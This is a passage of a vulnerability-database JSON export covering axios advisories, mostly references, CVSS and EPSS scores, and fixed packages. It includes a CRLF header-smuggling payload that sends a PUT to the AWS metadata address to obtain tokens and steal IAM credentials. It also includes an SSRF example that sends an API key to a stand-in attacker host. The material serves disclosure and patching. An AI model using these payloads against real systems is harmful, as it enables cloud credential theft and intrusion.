/latest/api/token HTTP/1.1\\r\\nHost: 169.254.169.254\\r\\nX-aws-ec2-metadata-token-ttl-seconds: 21600\\r\\n\\r\\nGET /ignore\";\n```\n\n### 2. The Gadget Trigger (Safe Code)\nThe application makes a completely safe, hardcoded request:\n```javascript\n// This looks safe to the developer\nawait axios.get('https://analytics.internal/pings'); \n```\n\n### 3. The Execution\nAxios merges the prototype property `x-amz-target` into the request headers. It then writes the header value directly to the socket without validation.\n\n**Resulting HTTP traffic:**\n```http\nGET /pings HTTP/1.1\nHost: analytics.internal\nx-amz-target: dummy\n\nPUT /latest/api/token HTTP/1.1\nHost: 169.254.169.254\nX-aws-ec2-metadata-token-ttl-seconds: 21600\n\nGET /ignore HTTP/1.1\n...\n```\n\n### 4. The Impact (IMDSv2 Bypass)\nThe \"Smuggled\" second request is a valid `PUT` request to the AWS Metadata Service. It includes the required `X-aws-ec2-metadata-token-ttl-seconds` header (which a normal SSRF cannot send).\nThe Metadata Service returns a session token, allowing the attacker to steal IAM credentials and compromise the cloud account.\n\n## Impact Analysis\n- **Security Control Bypass**: Defeats AWS IMDSv2 (Session Tokens).\n- **Authentication Bypass**: Can inject headers (`Cookie`, `Authorization`) to pivot into internal administrative panels.\n- **Cache Poisoning**: Can inject `Host` headers to poison shared caches.\n\n## Recommended Fix\nValidate all header values in `lib/adapters/http.js` and `xhr.js` before passing them to the underlying request function.\n\n**Patch Suggestion:**\n```javascript\n// In lib/adapters/http.js\nutils.forEach(requestHeaders, function setRequestHeader(val, key) {\n if (/[\\r\\n]/.test(val)) {\n throw new Error('Security: Header value contains invalid characters');\n }\n // ... proceed to set header\n});\n```\n\n## References\n- **OWASP**: CRLF Injection (CWE-113)\n\nThis report was generated as part of a security audit of the Axios library.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40175","reference_id":"","reference_type":"","scores":[{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.0722","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.0785","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.07879","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.07911","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.13652","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00136","scoring_system":"epss","scoring_elements":"0.33357","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00239","scoring_system":"epss","scoring_elements":"0.46955","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00239","scoring_system":"epss","scoring_elements":"0.46962","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00239","scoring_system":"epss","scoring_elements":"0.46982","published_at":"2026-04-11T12:55:00Z"},{"value":"0.0053","scoring_system":"epss","scoring_elements":"0.67279","published_at":"2026-04-16T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40175"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"}],"url":"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c"},{"reference_url":"https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"}],"url":"https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1"},{"reference_url":"https://github.com/axios/axios/pull/10660","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"}],"url":"https://github.com/axios/axios/pull/10660"},{"reference_url":"https://github.com/axios/axios/pull/10660#issuecomment-4224168081","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/10660#issuecomment-4224168081"},{"reference_url":"https://github.com/axios/axios/pull/10688","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"}],"url":"https://github.com/axios/axios/pull/10688"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.31.0","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"}],"url":"https://github.com/axios/axios/releases/tag/v0.31.0"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.15.0","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.15.0"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40175","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40175"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2457432","reference_id":"2457432","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2457432"},{"reference_url":"https://github.com/advisories/GHSA-fvcv-3m26-pcqx","reference_id":"GHSA-fvcv-3m26-pcqx","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fvcv-3m26-pcqx"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10104","reference_id":"RHSA-2026:10104","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10104"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10153","reference_id":"RHSA-2026:10153","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10153"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10172","reference_id":"RHSA-2026:10172","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10172"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10175","reference_id":"RHSA-2026:10175","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10175"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:11414","reference_id":"RHSA-2026:11414","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:11414"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13542","reference_id":"RHSA-2026:13542","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13542"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13548","reference_id":"RHSA-2026:13548","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13548"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13571","reference_id":"RHSA-2026:13571","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13571"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13826","reference_id":"RHSA-2026:13826","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13826"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8483","reference_id":"RHSA-2026:8483","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8483"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8484","reference_id":"RHSA-2026:8484","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8484"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8490","reference_id":"RHSA-2026:8490","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8490"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8491","reference_id":"RHSA-2026:8491","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8491"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8493","reference_id":"RHSA-2026:8493","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8493"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8499","reference_id":"RHSA-2026:8499","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8499"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8500","reference_id":"RHSA-2026:8500","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8500"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8501","reference_id":"RHSA-2026:8501","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8501"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:9742","reference_id":"RHSA-2026:9742","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:9742"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-40175","GHSA-fvcv-3m26-pcqx"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ek49-tuj4-t3ap"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354414?format=json","vulnerability_id":"VCID-gtc3-vrcs-yfb9","summary":"Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.15.2, he Axios library is vulnerable to a Prototype Pollution \"Gadget\" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into surgical, invisible modification of all JSON API responses — including privilege escalation, balance manipulation, and authorization bypass. The default transformResponse function at lib/defaults/index.js:124 calls JSON.parse(data, this.parseReviver), where this is the merged config object. Because parseReviver is not present in Axios defaults, not validated by assertOptions, and not subject to any constraints, a polluted Object.prototype.parseReviver function is called for every key-value pair in every JSON response, allowing the attacker to selectively modify individual values while leaving the rest of the response intact. This vulnerability is fixed in 1.15.2.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42044","reference_id":"","reference_type":"","scores":[{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08451","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00075","scoring_system":"epss","scoring_elements":"0.22304","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00098","scoring_system":"epss","scoring_elements":"0.26665","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42044"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42044","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42044"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42044","reference_id":"CVE-2026-42044","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42044"},{"reference_url":"https://github.com/advisories/GHSA-3w6x-2g7m-8v23","reference_id":"GHSA-3w6x-2g7m-8v23","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3w6x-2g7m-8v23"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23","reference_id":"GHSA-3w6x-2g7m-8v23","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:11:49Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42044","GHSA-3w6x-2g7m-8v23"],"risk_score":3.0,"exploitability":"0.5","weighted_severity":"5.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gtc3-vrcs-yfb9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29219?format=json","vulnerability_id":"VCID-hq6f-86aj-8yav","summary":"axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL\n### Summary\n\nA previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463\n\nA similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠`baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.\n\n### Details\n\nConsider the following code snippet:\n\n```js\nimport axios from \"axios\";\n\nconst internalAPIClient = axios.create({\n baseURL: \"http://example.test/api/v1/users/\",\n headers: {\n \"X-API-KEY\": \"1234567890\",\n },\n});\n\n// const userId = \"123\";\nconst userId = \"http://attacker.test/\";\n\nawait internalAPIClient.get(userId); // SSRF\n```\n\nIn this example, the request is sent to `http://attacker.test/` instead of the `baseURL`. As a result, the domain owner of `attacker.test` would receive the `X-API-KEY` included in the request headers.\n\nIt is recommended that:\n\n-\tWhen `baseURL` is set, passing an absolute URL such as `http://attacker.test/` to `get()` should not ignore `baseURL`.\n-\tBefore sending the HTTP request (after combining the `baseURL` with the user-provided parameter), axios should verify that the resulting URL still begins with the expected `baseURL`.\n\n### PoC\n\nFollow the steps below to reproduce the issue:\n\n1.\tSet up two simple HTTP servers:\n\n```\nmkdir /tmp/server1 /tmp/server2\necho \"this is server1\" > /tmp/server1/index.html \necho \"this is server2\" > /tmp/server2/index.html\npython -m http.server -d /tmp/server1 10001 &\npython -m http.server -d /tmp/server2 10002 &\n```\n\n\n2.\tCreate a script (e.g., main.js):\n\n```js\nimport axios from \"axios\";\nconst client = axios.create({ baseURL: \"http://localhost:10001/\" });\nconst response = await client.get(\"http://localhost:10002/\");\nconsole.log(response.data);\n```\n\n3.\tRun the script:\n\n```\n$ node main.js\nthis is server2\n```\n\nEven though `baseURL` is set to `http://localhost:10001/`, axios sends the request to `http://localhost:10002/`.\n\n### Impact\n\n-\tCredential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.\n-\tSSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.\n-\tAffected Users: Software that uses `baseURL` and does not validate path parameters is affected by this issue.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27152.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27152.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27152","reference_id":"","reference_type":"","scores":[{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21881","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21938","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21978","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21965","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.2191","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21835","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.2207","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.22018","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00212","scoring_system":"epss","scoring_elements":"0.43479","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.4436","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.44282","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.44363","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.44442","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00232","scoring_system":"epss","scoring_elements":"0.4609","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00232","scoring_system":"epss","scoring_elements":"0.46086","published_at":"2026-04-18T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27152"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27152","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27152"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde"},{"reference_url":"https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f"},{"reference_url":"https://github.com/axios/axios/issues/6463","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-07T19:32:00Z/"}],"url":"https://github.com/axios/axios/issues/6463"},{"reference_url":"https://github.com/axios/axios/pull/6829","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/6829"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.8.2","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/releases/tag/v1.8.2"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-07T19:32:00Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27152","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scorin